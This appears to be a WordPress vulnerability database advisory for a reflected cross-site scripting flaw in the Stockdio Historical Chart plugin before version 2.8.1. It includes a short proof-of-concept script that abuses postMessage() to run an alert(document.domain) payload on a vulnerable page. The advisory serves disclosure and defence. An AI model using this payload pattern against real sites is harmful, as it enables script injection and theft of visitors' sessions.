WordPress Plugin Vulnerabilities
Stockdio Historical Chart < 2.8.1 - Reflected Cross-Site Scripting (XSS)
Description
The plugin was affected by a Reflected Cross-Site Scripting issue via the postMessage() event.
Proof of Concept
Use the following code on another website <script> var popup = window.open('https://VULNERABLE.PAGE/'); var msg = {}; msg.method = "alert(document.domain)"; function post(){popup.postMessage(msg,'*')} setInterval(post,1000); </script>
Affects Plugins
References
Classification
Type
XSS
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
jondow
Verified
No
WPVDB ID
Timeline
Publicly Published
2021-01-20 (about 3 years ago)
Added
2021-01-20 (about 3 years ago)
Last Updated
2021-01-21 (about 3 years ago)